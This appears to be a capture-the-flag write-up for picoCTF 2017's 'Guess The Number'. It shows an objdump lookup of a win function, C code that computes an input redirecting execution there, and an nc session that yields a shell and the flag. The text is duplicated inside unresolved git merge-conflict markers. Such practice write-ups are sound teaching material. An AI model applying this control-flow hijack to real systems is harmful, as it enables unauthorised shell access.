<<<<<<< HEAD
[Go back](./Readme.md)

### Guess The Number - 75 points

Similar to the last one, I start by finding the address of the win function:

```
$ objdump -d guess_num | grep win
0804852b <win>:
```

Then I started screwing around with 0x0804852b to get a value that would equal that after being shifted 4 bits to the right. The required value is -2142743873, obtained by this C code:

```c
const long long a = 0x0804852b;
const long long mask = 0xf7fffffff;
const long long val = ~((~a << 4) & mask);
```

I still don't fully understand why this works, but that's what I got after seeing what different masks output.

```
$ nc shell2017.picoctf.com 13532
Welcome to the number guessing game!
I'm thinking of a number. Can you guess it?
Guess right and you get a shell!
Enter your number: -2142743873
You entered -2142743873. Let's see if it was right...
Congratulations! Have a shell:
/bin/sh: 0: can't access tty; job control turned off
$ ls
flag.txt
guess_num
xinetd_wrapper.sh
$ cat flag.txt
eb485c1755fc97d4a3f0c3cc136f62e8
```
=======
[Go back](./Readme.md)

### Guess The Number - 75 points

Similar to the last one, I start by finding the address of the win function:

```
$ objdump -d guess_num | grep win
0804852b <win>:
```

Then I started screwing around with 0x0804852b to get a value that would equal that after being shifted 4 bits to the right. The required value is -2142743873, obtained by this C code:

```c
const long long a = 0x0804852b;
const long long mask = 0xf7fffffff;
const long long val = ~((~a << 4) & mask);
```

I still don't fully understand why this works, but that's what I got after seeing what different masks output.

```
$ nc shell2017.picoctf.com 13532
Welcome to the number guessing game!
I'm thinking of a number. Can you guess it?
Guess right and you get a shell!
Enter your number: -2142743873
You entered -2142743873. Let's see if it was right...
Congratulations! Have a shell:
/bin/sh: 0: can't access tty; job control turned off
$ ls
flag.txt
guess_num
xinetd_wrapper.sh
$ cat flag.txt
eb485c1755fc97d4a3f0c3cc136f62e8
```
>>>>>>> master
